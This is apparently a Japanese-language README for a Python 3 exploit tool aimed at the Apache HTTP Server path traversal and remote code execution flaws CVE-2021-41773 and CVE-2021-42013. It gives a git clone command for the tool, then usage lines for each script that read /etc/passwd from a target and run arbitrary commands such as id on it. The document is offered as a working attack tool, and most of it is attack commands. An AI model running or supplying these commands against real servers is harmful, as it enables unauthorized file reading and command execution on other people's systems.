
Apache Webサーバーの既知の脆弱性(CVE-2021-41773、CVE-2021-42013)を悪用するためにpython3で作成されたエクスプロイト
Apache Webサーバ(CVE-2021-41773、CVE-2021-42013)における既知の脆弱性を悪用するために作成されたpython3エクスプロイト
Apache HTTP Server Projectは、UNIXやWindowsを含む最新のオペレーティングシステム向けのオープンソースHTTPサーバを開発・保守する取り組みです。このプロジェクトの目標は、現在のHTTP標準に準拠したHTTPサービスを提供する、安全で効率的かつ拡張可能なサーバを提供することです。
git cloneを実行するだけです:
git clone https://github.com/0xGabe/Apache-CVEs
目的のファイルを読み取るには、ファイルパスを指定してください。ユーザーに読み取り権限がない場合は、読み取り結果は表示されません。
python3 cve-2021-41773.py --url http://HOST:PORT --path /etc/passwd
ターゲットマシン上でスペースや特殊文字などを含むコマンドを実行するには、コマンドを引用符で囲む必要があります。
python3 cve-2021-41773.py --url http://HOST:PORT --cmd id
目的のファイルを読み取るには、ファイルパスを指定してください。ユーザーに読み取り権限がない場合は、読み取り結果は表示されません。
python3 cve-2021-42013.py --url http://HOST:PORT --path /etc/passwd
ターゲットマシン上でスペースや特殊文字などを含むコマンドを実行するには、コマンドを引用符で囲む必要があります。
python3 cve-2021-42013.py --url http://HOST:PORT --cmd id